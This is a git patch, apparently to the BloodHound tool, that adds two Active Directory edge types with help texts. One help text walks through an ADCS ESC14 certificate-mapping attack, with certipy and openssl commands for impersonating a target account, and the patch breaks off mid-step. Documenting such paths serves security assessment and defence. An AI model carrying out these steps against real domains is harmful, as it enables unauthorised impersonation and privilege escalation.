From f2cd89d8479ea91bafa1a7c3c188dd765c84ef61 Mon Sep 17 00:00:00 2001 From: jknudsen Date: Wed, 11 Jun 2025 19:24:07 +0200 Subject: [PATCH 1/9] add WriteAltSecurityIdentities and WritePublicInformation edges --- packages/cue/bh/ad/ad.cue | 16 +++ packages/go/graphschema/ad/ad.go | 12 +- packages/go/graphschema/common/common.go | 4 +- .../WriteAltSecurityIdentities/General.tsx | 39 +++++ .../WriteAltSecurityIdentities/LinuxAbuse.tsx | 128 +++++++++++++++++ .../WriteAltSecurityIdentities/Opsec.tsx | 33 +++++ .../WriteAltSecurityIdentities/References.tsx | 99 +++++++++++++ .../WindowsAbuse.tsx | 136 ++++++++++++++++++ .../WriteAltSecurityIdentities.tsx | 31 ++++ .../WritePublicInformation/General.tsx | 39 +++++ .../WritePublicInformation/LinuxAbuse.tsx | 128 +++++++++++++++++ .../WritePublicInformation/Opsec.tsx | 33 +++++ .../WritePublicInformation/References.tsx | 99 +++++++++++++ .../WritePublicInformation/WindowsAbuse.tsx | 136 ++++++++++++++++++ .../WritePublicInformation.tsx | 31 ++++ .../src/components/HelpTexts/index.tsx | 4 + .../javascript/bh-shared-ui/src/edgeTypes.tsx | 2 + .../bh-shared-ui/src/graphSchema.ts | 8 ++ 18 files changed, 971 insertions(+), 7 deletions(-) create mode 100644 packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteAltSecurityIdentities/General.tsx create mode 100644 packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteAltSecurityIdentities/LinuxAbuse.tsx create mode 100644 packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteAltSecurityIdentities/Opsec.tsx create mode 100644 packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteAltSecurityIdentities/References.tsx create mode 100644 packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteAltSecurityIdentities/WindowsAbuse.tsx create mode 100644 packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteAltSecurityIdentities/WriteAltSecurityIdentities.tsx create mode 100644 packages/javascript/bh-shared-ui/src/components/HelpTexts/WritePublicInformation/General.tsx create mode 100644 packages/javascript/bh-shared-ui/src/components/HelpTexts/WritePublicInformation/LinuxAbuse.tsx create mode 100644 packages/javascript/bh-shared-ui/src/components/HelpTexts/WritePublicInformation/Opsec.tsx create mode 100644 packages/javascript/bh-shared-ui/src/components/HelpTexts/WritePublicInformation/References.tsx create mode 100644 packages/javascript/bh-shared-ui/src/components/HelpTexts/WritePublicInformation/WindowsAbuse.tsx create mode 100644 packages/javascript/bh-shared-ui/src/components/HelpTexts/WritePublicInformation/WritePublicInformation.tsx diff --git a/packages/cue/bh/ad/ad.cue b/packages/cue/bh/ad/ad.cue index 047ac915c24..32941c07929 100644 --- a/packages/cue/bh/ad/ad.cue +++ b/packages/cue/bh/ad/ad.cue @@ -1655,6 +1655,16 @@ CanApplyGPO: types.#Kind & { schema: "active_directory" } +WriteAltSecurityIdentities: types.#Kind & { + symbol: "WriteAltSecurityIdentities" + schema: "active_directory" +} + +WritePublicInformation: types.#Kind & { + symbol: "WritePublicInformation" + schema: "active_directory" +} + // Relationship Kinds RelationshipKinds: [ Owns, @@ -1742,6 +1752,8 @@ RelationshipKinds: [ GPOAppliesTo, CanApplyGPO, HasTrustKeys, + WriteAltSecurityIdentities, + WritePublicInformation, ] // ACL Relationships @@ -1774,6 +1786,8 @@ ACLRelationships: [ WritePKINameFlag, WriteOwnerLimitedRights, OwnsLimitedRights, + WriteAltSecurityIdentities, + WritePublicInformation, ] // these edges are common to inbound/outbound/pathfinding @@ -1832,6 +1846,8 @@ SharedRelationshipKinds: [ GPOAppliesTo, CanApplyGPO, HasTrustKeys, + WriteAltSecurityIdentities, + WritePublicInformation, ] // Edges that are used during inbound traversal diff --git a/packages/go/graphschema/ad/ad.go b/packages/go/graphschema/ad/ad.go index e29bf1c0ae2..b2e5e65d3f6 100644 --- a/packages/go/graphschema/ad/ad.go +++ b/packages/go/graphschema/ad/ad.go @@ -126,6 +126,8 @@ var ( GPOAppliesTo = graph.StringKind("GPOAppliesTo") CanApplyGPO = graph.StringKind("CanApplyGPO") HasTrustKeys = graph.StringKind("HasTrustKeys") + WriteAltSecurityIdentities = graph.StringKind("WriteAltSecurityIdentities") + WritePublicInformation = graph.StringKind("WritePublicInformation") ) type Property string @@ -1097,19 +1099,19 @@ func Nodes() []graph.Kind { return []graph.Kind{Entity, User, Computer, Group, GPO, OU, Container, Domain, LocalGroup, LocalUser, AIACA, RootCA, EnterpriseCA, NTAuthStore, CertTemplate, IssuancePolicy} } func Relationships() []graph.Kind { - return []graph.Kind{Owns, GenericAll, GenericWrite, WriteOwner, WriteDACL, MemberOf, ForceChangePassword, AllExtendedRights, AddMember, HasSession, Contains, GPLink, AllowedToDelegate, CoerceToTGT, GetChanges, GetChangesAll, GetChangesInFilteredSet, CrossForestTrust, SameForestTrust, SpoofSIDHistory, AbuseTGTDelegation, AllowedToAct, AdminTo, CanPSRemote, CanRDP, ExecuteDCOM, HasSIDHistory, AddSelf, DCSync, ReadLAPSPassword, ReadGMSAPassword, DumpSMSAPassword, SQLAdmin, AddAllowedToAct, WriteSPN, AddKeyCredentialLink, LocalToComputer, MemberOfLocalGroup, RemoteInteractiveLogonRight, SyncLAPSPassword, WriteAccountRestrictions, WriteGPLink, RootCAFor, DCFor, PublishedTo, ManageCertificates, ManageCA, DelegatedEnrollmentAgent, Enroll, HostsCAService, WritePKIEnrollmentFlag, WritePKINameFlag, NTAuthStoreFor, TrustedForNTAuth, EnterpriseCAFor, IssuedSignedBy, GoldenCert, EnrollOnBehalfOf, OIDGroupLink, ExtendedByPolicy, ADCSESC1, ADCSESC3, ADCSESC4, ADCSESC6a, ADCSESC6b, ADCSESC9a, ADCSESC9b, ADCSESC10a, ADCSESC10b, ADCSESC13, SyncedToEntraUser, CoerceAndRelayNTLMToSMB, CoerceAndRelayNTLMToADCS, WriteOwnerLimitedRights, WriteOwnerRaw, OwnsLimitedRights, OwnsRaw, ClaimSpecialIdentity, CoerceAndRelayNTLMToLDAP, CoerceAndRelayNTLMToLDAPS, ContainsIdentity, PropagatesACEsTo, GPOAppliesTo, CanApplyGPO, HasTrustKeys} + return []graph.Kind{Owns, GenericAll, GenericWrite, WriteOwner, WriteDACL, MemberOf, ForceChangePassword, AllExtendedRights, AddMember, HasSession, Contains, GPLink, AllowedToDelegate, CoerceToTGT, GetChanges, GetChangesAll, GetChangesInFilteredSet, CrossForestTrust, SameForestTrust, SpoofSIDHistory, AbuseTGTDelegation, AllowedToAct, AdminTo, CanPSRemote, CanRDP, ExecuteDCOM, HasSIDHistory, AddSelf, DCSync, ReadLAPSPassword, ReadGMSAPassword, DumpSMSAPassword, SQLAdmin, AddAllowedToAct, WriteSPN, AddKeyCredentialLink, LocalToComputer, MemberOfLocalGroup, RemoteInteractiveLogonRight, SyncLAPSPassword, WriteAccountRestrictions, WriteGPLink, RootCAFor, DCFor, PublishedTo, ManageCertificates, ManageCA, DelegatedEnrollmentAgent, Enroll, HostsCAService, WritePKIEnrollmentFlag, WritePKINameFlag, NTAuthStoreFor, TrustedForNTAuth, EnterpriseCAFor, IssuedSignedBy, GoldenCert, EnrollOnBehalfOf, OIDGroupLink, ExtendedByPolicy, ADCSESC1, ADCSESC3, ADCSESC4, ADCSESC6a, ADCSESC6b, ADCSESC9a, ADCSESC9b, ADCSESC10a, ADCSESC10b, ADCSESC13, SyncedToEntraUser, CoerceAndRelayNTLMToSMB, CoerceAndRelayNTLMToADCS, WriteOwnerLimitedRights, WriteOwnerRaw, OwnsLimitedRights, OwnsRaw, ClaimSpecialIdentity, CoerceAndRelayNTLMToLDAP, CoerceAndRelayNTLMToLDAPS, ContainsIdentity, PropagatesACEsTo, GPOAppliesTo, CanApplyGPO, HasTrustKeys, WriteAltSecurityIdentities, WritePublicInformation} } func ACLRelationships() []graph.Kind { - return []graph.Kind{AllExtendedRights, ForceChangePassword, AddMember, AddAllowedToAct, GenericAll, WriteDACL, WriteOwner, GenericWrite, ReadLAPSPassword, ReadGMSAPassword, Owns, AddSelf, WriteSPN, AddKeyCredentialLink, GetChanges, GetChangesAll, GetChangesInFilteredSet, WriteAccountRestrictions, WriteGPLink, SyncLAPSPassword, DCSync, ManageCertificates, ManageCA, Enroll, WritePKIEnrollmentFlag, WritePKINameFlag, WriteOwnerLimitedRights, OwnsLimitedRights} + return []graph.Kind{AllExtendedRights, ForceChangePassword, AddMember, AddAllowedToAct, GenericAll, WriteDACL, WriteOwner, GenericWrite, ReadLAPSPassword, ReadGMSAPassword, Owns, AddSelf, WriteSPN, AddKeyCredentialLink, GetChanges, GetChangesAll, GetChangesInFilteredSet, WriteAccountRestrictions, WriteGPLink, SyncLAPSPassword, DCSync, ManageCertificates, ManageCA, Enroll, WritePKIEnrollmentFlag, WritePKINameFlag, WriteOwnerLimitedRights, OwnsLimitedRights, WriteAltSecurityIdentities, WritePublicInformation} } func PathfindingRelationships() []graph.Kind { - return []graph.Kind{Owns, GenericAll, GenericWrite, WriteOwner, WriteDACL, MemberOf, ForceChangePassword, AllExtendedRights, AddMember, HasSession, AllowedToDelegate, CoerceToTGT, AllowedToAct, AdminTo, CanPSRemote, CanRDP, ExecuteDCOM, HasSIDHistory, AddSelf, DCSync, ReadLAPSPassword, ReadGMSAPassword, DumpSMSAPassword, SQLAdmin, AddAllowedToAct, WriteSPN, AddKeyCredentialLink, SyncLAPSPassword, WriteAccountRestrictions, WriteGPLink, GoldenCert, ADCSESC1, ADCSESC3, ADCSESC4, ADCSESC6a, ADCSESC6b, ADCSESC9a, ADCSESC9b, ADCSESC10a, ADCSESC10b, ADCSESC13, SyncedToEntraUser, CoerceAndRelayNTLMToSMB, CoerceAndRelayNTLMToADCS, WriteOwnerLimitedRights, OwnsLimitedRights, ClaimSpecialIdentity, CoerceAndRelayNTLMToLDAP, CoerceAndRelayNTLMToLDAPS, ContainsIdentity, PropagatesACEsTo, GPOAppliesTo, CanApplyGPO, HasTrustKeys, DCFor, SameForestTrust, SpoofSIDHistory, AbuseTGTDelegation} + return []graph.Kind{Owns, GenericAll, GenericWrite, WriteOwner, WriteDACL, MemberOf, ForceChangePassword, AllExtendedRights, AddMember, HasSession, AllowedToDelegate, CoerceToTGT, AllowedToAct, AdminTo, CanPSRemote, CanRDP, ExecuteDCOM, HasSIDHistory, AddSelf, DCSync, ReadLAPSPassword, ReadGMSAPassword, DumpSMSAPassword, SQLAdmin, AddAllowedToAct, WriteSPN, AddKeyCredentialLink, SyncLAPSPassword, WriteAccountRestrictions, WriteGPLink, GoldenCert, ADCSESC1, ADCSESC3, ADCSESC4, ADCSESC6a, ADCSESC6b, ADCSESC9a, ADCSESC9b, ADCSESC10a, ADCSESC10b, ADCSESC13, SyncedToEntraUser, CoerceAndRelayNTLMToSMB, CoerceAndRelayNTLMToADCS, WriteOwnerLimitedRights, OwnsLimitedRights, ClaimSpecialIdentity, CoerceAndRelayNTLMToLDAP, CoerceAndRelayNTLMToLDAPS, ContainsIdentity, PropagatesACEsTo, GPOAppliesTo, CanApplyGPO, HasTrustKeys, WriteAltSecurityIdentities, WritePublicInformation, DCFor, SameForestTrust, SpoofSIDHistory, AbuseTGTDelegation} } func InboundRelationshipKinds() []graph.Kind { - return []graph.Kind{Owns, GenericAll, GenericWrite, WriteOwner, WriteDACL, MemberOf, ForceChangePassword, AllExtendedRights, AddMember, HasSession, AllowedToDelegate, CoerceToTGT, AllowedToAct, AdminTo, CanPSRemote, CanRDP, ExecuteDCOM, HasSIDHistory, AddSelf, DCSync, ReadLAPSPassword, ReadGMSAPassword, DumpSMSAPassword, SQLAdmin, AddAllowedToAct, WriteSPN, AddKeyCredentialLink, SyncLAPSPassword, WriteAccountRestrictions, WriteGPLink, GoldenCert, ADCSESC1, ADCSESC3, ADCSESC4, ADCSESC6a, ADCSESC6b, ADCSESC9a, ADCSESC9b, ADCSESC10a, ADCSESC10b, ADCSESC13, SyncedToEntraUser, CoerceAndRelayNTLMToSMB, CoerceAndRelayNTLMToADCS, WriteOwnerLimitedRights, OwnsLimitedRights, ClaimSpecialIdentity, CoerceAndRelayNTLMToLDAP, CoerceAndRelayNTLMToLDAPS, ContainsIdentity, PropagatesACEsTo, GPOAppliesTo, CanApplyGPO, HasTrustKeys} + return []graph.Kind{Owns, GenericAll, GenericWrite, WriteOwner, WriteDACL, MemberOf, ForceChangePassword, AllExtendedRights, AddMember, HasSession, AllowedToDelegate, CoerceToTGT, AllowedToAct, AdminTo, CanPSRemote, CanRDP, ExecuteDCOM, HasSIDHistory, AddSelf, DCSync, ReadLAPSPassword, ReadGMSAPassword, DumpSMSAPassword, SQLAdmin, AddAllowedToAct, WriteSPN, AddKeyCredentialLink, SyncLAPSPassword, WriteAccountRestrictions, WriteGPLink, GoldenCert, ADCSESC1, ADCSESC3, ADCSESC4, ADCSESC6a, ADCSESC6b, ADCSESC9a, ADCSESC9b, ADCSESC10a, ADCSESC10b, ADCSESC13, SyncedToEntraUser, CoerceAndRelayNTLMToSMB, CoerceAndRelayNTLMToADCS, WriteOwnerLimitedRights, OwnsLimitedRights, ClaimSpecialIdentity, CoerceAndRelayNTLMToLDAP, CoerceAndRelayNTLMToLDAPS, ContainsIdentity, PropagatesACEsTo, GPOAppliesTo, CanApplyGPO, HasTrustKeys, WriteAltSecurityIdentities, WritePublicInformation} } func OutboundRelationshipKinds() []graph.Kind { - return []graph.Kind{Owns, GenericAll, GenericWrite, WriteOwner, WriteDACL, MemberOf, ForceChangePassword, AllExtendedRights, AddMember, HasSession, AllowedToDelegate, CoerceToTGT, AllowedToAct, AdminTo, CanPSRemote, CanRDP, ExecuteDCOM, HasSIDHistory, AddSelf, DCSync, ReadLAPSPassword, ReadGMSAPassword, DumpSMSAPassword, SQLAdmin, AddAllowedToAct, WriteSPN, AddKeyCredentialLink, SyncLAPSPassword, WriteAccountRestrictions, WriteGPLink, GoldenCert, ADCSESC1, ADCSESC3, ADCSESC4, ADCSESC6a, ADCSESC6b, ADCSESC9a, ADCSESC9b, ADCSESC10a, ADCSESC10b, ADCSESC13, SyncedToEntraUser, CoerceAndRelayNTLMToSMB, CoerceAndRelayNTLMToADCS, WriteOwnerLimitedRights, OwnsLimitedRights, ClaimSpecialIdentity, CoerceAndRelayNTLMToLDAP, CoerceAndRelayNTLMToLDAPS, ContainsIdentity, PropagatesACEsTo, GPOAppliesTo, CanApplyGPO, HasTrustKeys, DCFor} + return []graph.Kind{Owns, GenericAll, GenericWrite, WriteOwner, WriteDACL, MemberOf, ForceChangePassword, AllExtendedRights, AddMember, HasSession, AllowedToDelegate, CoerceToTGT, AllowedToAct, AdminTo, CanPSRemote, CanRDP, ExecuteDCOM, HasSIDHistory, AddSelf, DCSync, ReadLAPSPassword, ReadGMSAPassword, DumpSMSAPassword, SQLAdmin, AddAllowedToAct, WriteSPN, AddKeyCredentialLink, SyncLAPSPassword, WriteAccountRestrictions, WriteGPLink, GoldenCert, ADCSESC1, ADCSESC3, ADCSESC4, ADCSESC6a, ADCSESC6b, ADCSESC9a, ADCSESC9b, ADCSESC10a, ADCSESC10b, ADCSESC13, SyncedToEntraUser, CoerceAndRelayNTLMToSMB, CoerceAndRelayNTLMToADCS, WriteOwnerLimitedRights, OwnsLimitedRights, ClaimSpecialIdentity, CoerceAndRelayNTLMToLDAP, CoerceAndRelayNTLMToLDAPS, ContainsIdentity, PropagatesACEsTo, GPOAppliesTo, CanApplyGPO, HasTrustKeys, WriteAltSecurityIdentities, WritePublicInformation, DCFor} } func IsACLKind(s graph.Kind) bool { for _, acl := range ACLRelationships() { diff --git a/packages/go/graphschema/common/common.go b/packages/go/graphschema/common/common.go index 7431adad2e5..b69ea2a23bc 100644 --- a/packages/go/graphschema/common/common.go +++ b/packages/go/graphschema/common/common.go @@ -40,10 +40,10 @@ func NodeKinds() []graph.Kind { return []graph.Kind{MigrationData} } func InboundRelationshipKinds() []graph.Kind { - return []graph.Kind{ad.Owns, ad.GenericAll, ad.GenericWrite, ad.WriteOwner, ad.WriteDACL, ad.MemberOf, ad.ForceChangePassword, ad.AllExtendedRights, ad.AddMember, ad.HasSession, ad.AllowedToDelegate, ad.CoerceToTGT, ad.AllowedToAct, ad.AdminTo, ad.CanPSRemote, ad.CanRDP, ad.ExecuteDCOM, ad.HasSIDHistory, ad.AddSelf, ad.DCSync, ad.ReadLAPSPassword, ad.ReadGMSAPassword, ad.DumpSMSAPassword, ad.SQLAdmin, ad.AddAllowedToAct, ad.WriteSPN, ad.AddKeyCredentialLink, ad.SyncLAPSPassword, ad.WriteAccountRestrictions, ad.WriteGPLink, ad.GoldenCert, ad.ADCSESC1, ad.ADCSESC3, ad.ADCSESC4, ad.ADCSESC6a, ad.ADCSESC6b, ad.ADCSESC9a, ad.ADCSESC9b, ad.ADCSESC10a, ad.ADCSESC10b, ad.ADCSESC13, ad.SyncedToEntraUser, ad.CoerceAndRelayNTLMToSMB, ad.CoerceAndRelayNTLMToADCS, ad.WriteOwnerLimitedRights, ad.OwnsLimitedRights, ad.ClaimSpecialIdentity, ad.CoerceAndRelayNTLMToLDAP, ad.CoerceAndRelayNTLMToLDAPS, ad.ContainsIdentity, ad.PropagatesACEsTo, ad.GPOAppliesTo, ad.CanApplyGPO, ad.HasTrustKeys, azure.AvereContributor, azure.Contributor, azure.GetCertificates, azure.GetKeys, azure.GetSecrets, azure.HasRole, azure.MemberOf, azure.Owner, azure.RunsAs, azure.VMContributor, azure.AutomationContributor, azure.KeyVaultContributor, azure.VMAdminLogin, azure.AddMembers, azure.AddSecret, azure.ExecuteCommand, azure.GlobalAdmin, azure.PrivilegedAuthAdmin, azure.Grant, azure.GrantSelf, azure.PrivilegedRoleAdmin, azure.ResetPassword, azure.UserAccessAdministrator, azure.Owns, azure.CloudAppAdmin, azure.AppAdmin, azure.AddOwner, azure.ManagedIdentity, azure.AKSContributor, azure.NodeResourceGroup, azure.WebsiteContributor, azure.LogicAppContributor, azure.AZMGAddMember, azure.AZMGAddOwner, azure.AZMGAddSecret, azure.AZMGGrantAppRoles, azure.AZMGGrantRole, azure.SyncedToADUser, azure.AZRoleEligible, azure.AZRoleApprover} + return []graph.Kind{ad.Owns, ad.GenericAll, ad.GenericWrite, ad.WriteOwner, ad.WriteDACL, ad.MemberOf, ad.ForceChangePassword, ad.AllExtendedRights, ad.AddMember, ad.HasSession, ad.AllowedToDelegate, ad.CoerceToTGT, ad.AllowedToAct, ad.AdminTo, ad.CanPSRemote, ad.CanRDP, ad.ExecuteDCOM, ad.HasSIDHistory, ad.AddSelf, ad.DCSync, ad.ReadLAPSPassword, ad.ReadGMSAPassword, ad.DumpSMSAPassword, ad.SQLAdmin, ad.AddAllowedToAct, ad.WriteSPN, ad.AddKeyCredentialLink, ad.SyncLAPSPassword, ad.WriteAccountRestrictions, ad.WriteGPLink, ad.GoldenCert, ad.ADCSESC1, ad.ADCSESC3, ad.ADCSESC4, ad.ADCSESC6a, ad.ADCSESC6b, ad.ADCSESC9a, ad.ADCSESC9b, ad.ADCSESC10a, ad.ADCSESC10b, ad.ADCSESC13, ad.SyncedToEntraUser, ad.CoerceAndRelayNTLMToSMB, ad.CoerceAndRelayNTLMToADCS, ad.WriteOwnerLimitedRights, ad.OwnsLimitedRights, ad.ClaimSpecialIdentity, ad.CoerceAndRelayNTLMToLDAP, ad.CoerceAndRelayNTLMToLDAPS, ad.ContainsIdentity, ad.PropagatesACEsTo, ad.GPOAppliesTo, ad.CanApplyGPO, ad.HasTrustKeys, ad.WriteAltSecurityIdentities, ad.WritePublicInformation, azure.AvereContributor, azure.Contributor, azure.GetCertificates, azure.GetKeys, azure.GetSecrets, azure.HasRole, azure.MemberOf, azure.Owner, azure.RunsAs, azure.VMContributor, azure.AutomationContributor, azure.KeyVaultContributor, azure.VMAdminLogin, azure.AddMembers, azure.AddSecret, azure.ExecuteCommand, azure.GlobalAdmin, azure.PrivilegedAuthAdmin, azure.Grant, azure.GrantSelf, azure.PrivilegedRoleAdmin, azure.ResetPassword, azure.UserAccessAdministrator, azure.Owns, azure.CloudAppAdmin, azure.AppAdmin, azure.AddOwner, azure.ManagedIdentity, azure.AKSContributor, azure.NodeResourceGroup, azure.WebsiteContributor, azure.LogicAppContributor, azure.AZMGAddMember, azure.AZMGAddOwner, azure.AZMGAddSecret, azure.AZMGGrantAppRoles, azure.AZMGGrantRole, azure.SyncedToADUser, azure.AZRoleEligible, azure.AZRoleApprover} } func OutboundRelationshipKinds() []graph.Kind { - return []graph.Kind{ad.Owns, ad.GenericAll, ad.GenericWrite, ad.WriteOwner, ad.WriteDACL, ad.MemberOf, ad.ForceChangePassword, ad.AllExtendedRights, ad.AddMember, ad.HasSession, ad.AllowedToDelegate, ad.CoerceToTGT, ad.AllowedToAct, ad.AdminTo, ad.CanPSRemote, ad.CanRDP, ad.ExecuteDCOM, ad.HasSIDHistory, ad.AddSelf, ad.DCSync, ad.ReadLAPSPassword, ad.ReadGMSAPassword, ad.DumpSMSAPassword, ad.SQLAdmin, ad.AddAllowedToAct, ad.WriteSPN, ad.AddKeyCredentialLink, ad.SyncLAPSPassword, ad.WriteAccountRestrictions, ad.WriteGPLink, ad.GoldenCert, ad.ADCSESC1, ad.ADCSESC3, ad.ADCSESC4, ad.ADCSESC6a, ad.ADCSESC6b, ad.ADCSESC9a, ad.ADCSESC9b, ad.ADCSESC10a, ad.ADCSESC10b, ad.ADCSESC13, ad.SyncedToEntraUser, ad.CoerceAndRelayNTLMToSMB, ad.CoerceAndRelayNTLMToADCS, ad.WriteOwnerLimitedRights, ad.OwnsLimitedRights, ad.ClaimSpecialIdentity, ad.CoerceAndRelayNTLMToLDAP, ad.CoerceAndRelayNTLMToLDAPS, ad.ContainsIdentity, ad.PropagatesACEsTo, ad.GPOAppliesTo, ad.CanApplyGPO, ad.HasTrustKeys, ad.DCFor, azure.AvereContributor, azure.Contributor, azure.GetCertificates, azure.GetKeys, azure.GetSecrets, azure.HasRole, azure.MemberOf, azure.Owner, azure.RunsAs, azure.VMContributor, azure.AutomationContributor, azure.KeyVaultContributor, azure.VMAdminLogin, azure.AddMembers, azure.AddSecret, azure.ExecuteCommand, azure.GlobalAdmin, azure.PrivilegedAuthAdmin, azure.Grant, azure.GrantSelf, azure.PrivilegedRoleAdmin, azure.ResetPassword, azure.UserAccessAdministrator, azure.Owns, azure.CloudAppAdmin, azure.AppAdmin, azure.AddOwner, azure.ManagedIdentity, azure.AKSContributor, azure.NodeResourceGroup, azure.WebsiteContributor, azure.LogicAppContributor, azure.AZMGAddMember, azure.AZMGAddOwner, azure.AZMGAddSecret, azure.AZMGGrantAppRoles, azure.AZMGGrantRole, azure.SyncedToADUser, azure.AZRoleEligible, azure.AZRoleApprover} + return []graph.Kind{ad.Owns, ad.GenericAll, ad.GenericWrite, ad.WriteOwner, ad.WriteDACL, ad.MemberOf, ad.ForceChangePassword, ad.AllExtendedRights, ad.AddMember, ad.HasSession, ad.AllowedToDelegate, ad.CoerceToTGT, ad.AllowedToAct, ad.AdminTo, ad.CanPSRemote, ad.CanRDP, ad.ExecuteDCOM, ad.HasSIDHistory, ad.AddSelf, ad.DCSync, ad.ReadLAPSPassword, ad.ReadGMSAPassword, ad.DumpSMSAPassword, ad.SQLAdmin, ad.AddAllowedToAct, ad.WriteSPN, ad.AddKeyCredentialLink, ad.SyncLAPSPassword, ad.WriteAccountRestrictions, ad.WriteGPLink, ad.GoldenCert, ad.ADCSESC1, ad.ADCSESC3, ad.ADCSESC4, ad.ADCSESC6a, ad.ADCSESC6b, ad.ADCSESC9a, ad.ADCSESC9b, ad.ADCSESC10a, ad.ADCSESC10b, ad.ADCSESC13, ad.SyncedToEntraUser, ad.CoerceAndRelayNTLMToSMB, ad.CoerceAndRelayNTLMToADCS, ad.WriteOwnerLimitedRights, ad.OwnsLimitedRights, ad.ClaimSpecialIdentity, ad.CoerceAndRelayNTLMToLDAP, ad.CoerceAndRelayNTLMToLDAPS, ad.ContainsIdentity, ad.PropagatesACEsTo, ad.GPOAppliesTo, ad.CanApplyGPO, ad.HasTrustKeys, ad.WriteAltSecurityIdentities, ad.WritePublicInformation, ad.DCFor, azure.AvereContributor, azure.Contributor, azure.GetCertificates, azure.GetKeys, azure.GetSecrets, azure.HasRole, azure.MemberOf, azure.Owner, azure.RunsAs, azure.VMContributor, azure.AutomationContributor, azure.KeyVaultContributor, azure.VMAdminLogin, azure.AddMembers, azure.AddSecret, azure.ExecuteCommand, azure.GlobalAdmin, azure.PrivilegedAuthAdmin, azure.Grant, azure.GrantSelf, azure.PrivilegedRoleAdmin, azure.ResetPassword, azure.UserAccessAdministrator, azure.Owns, azure.CloudAppAdmin, azure.AppAdmin, azure.AddOwner, azure.ManagedIdentity, azure.AKSContributor, azure.NodeResourceGroup, azure.WebsiteContributor, azure.LogicAppContributor, azure.AZMGAddMember, azure.AZMGAddOwner, azure.AZMGAddSecret, azure.AZMGGrantAppRoles, azure.AZMGGrantRole, azure.SyncedToADUser, azure.AZRoleEligible, azure.AZRoleApprover} } type Property string diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteAltSecurityIdentities/General.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteAltSecurityIdentities/General.tsx new file mode 100644 index 00000000000..b74ed57f21e --- /dev/null +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteAltSecurityIdentities/General.tsx @@ -0,0 +1,39 @@ +// Copyright 2025 Specter Ops, Inc. +// +// Licensed under the Apache License, Version 2.0 +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +import { Typography } from '@mui/material'; +import { FC } from 'react'; +import { EdgeInfoProps } from '../index'; +import { groupSpecialFormat, typeFormat } from '../utils'; + +const General: FC = ({ sourceName, sourceType, targetName, targetType }) => { + return ( + <> + + {groupSpecialFormat(sourceType, sourceName)} the ability to write to the AltSecurityIdentities attribute + of the {typeFormat(targetType)} {targetName}. + + + + The altSecurityIdentities attribute allows you to specify explicit certificate mappings for a + principal. An explicit certificate mapping is a reference to a certificate, which can be used to + authenticate as the principal. + + + ); +}; + +export default General; diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteAltSecurityIdentities/LinuxAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteAltSecurityIdentities/LinuxAbuse.tsx new file mode 100644 index 00000000000..66fff611b33 --- /dev/null +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteAltSecurityIdentities/LinuxAbuse.tsx @@ -0,0 +1,128 @@ +// Copyright 2025 Specter Ops, Inc. +// +// Licensed under the Apache License, Version 2.0 +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +import { Link, Typography } from '@mui/material'; +import { FC } from 'react'; +import CodeController from '../CodeController/CodeController'; +import { EdgeInfoProps } from '../index'; + +const LinuxAbuse: FC = () => { + return ( + <> + + The write access to the AltSecurityIdentities may enable an ADCS ESC14 Scenario A attack. + + + An attacker can add an explicit certificate mapping in the AltSecurityIdentities of the target referring + to a certificate in the attacker's possession, and then use this certificate to authenticate as the + target. + + + The certificate must meet the following requirements: +
    +
  1. Chain up to trusted root CA on the DC
    2. +
  2. Enhanced Key Usage extension contains an EKU that enables domain authentication
    3. +
  3. Subject Alternative Name (SAN) does NOT contain a "Other Name/Principal Name" entry (UPN)
    4. +
+

+ The EKUs that enable domain authentication over Kerberos: +

    +
  • Client Authentication (1.3.6.1.5.5.7.3.2)
    • +
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • +
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • +
  • Any Purpose (2.5.29.37.0)
    • +
  • SubCA (no EKUs)
    • +
+

+

+ The last certificate requirement means that user certificates will not work, so the certificate + typically must be of a computer. By default, the ADCS certificate template Computer (Machine){' '} + meets these requirements and grants Domain Computers enrollment rights. The target can still be a + user. +

+ The last requirement does not have to be met if a DC has UPN mapping disabled (see{' '} + + How to disable the Subject Alternative Name for UPN mapping + + ). + + Step 1: Obtain certificate + + Obtain a certificate meeting the above requirements for example by dumping a certificate from a + computer, or enrolling a new certificate as a computer: + + + {'certipy req -u computername -p Passw0rd -ca corp-DC-CA -target ca.corp.local -template ESC14'} + + + If the enrollment fails with an error message stating that the Email or DNS name is unavailable and + cannot be added to the Subject or Subject Alternate name, then it is because the enrollee principal does + not have their mail or dNSHostName attribute set, which is required by the certificate template. The + mail attribute can be set on both user and computer objects but the dNSHostName attribute can only be + set on computer objects. Computers have validated write permission to their own dNSHostName attribute by + default, but neither users nor computers can write to their own mail attribute by default. + + Step 2: Get certificate mapping identifier + + The abuse is possible with the strong explicit certificate mappings X509IssuerSerialNumber or + X509SHA1PublicKey. In this example, we use X509SHA1PublicKey. + + Get the SHA1 hash of the certificate using openssl: + + {`openssl pkcs12 -info -in computername.pfx -nokeys | openssl x509 -noout -sha1 -fingerprint | tr -d ':' | tr '[:upper:]' '[:lower:]' +… +sha1 fingerprint=f61331a504cff8cb5e60c269632c31aa3032a54a`} + + Step 3: Add certificate mapping on target + + Use ldapmodify to add the explicit certificate 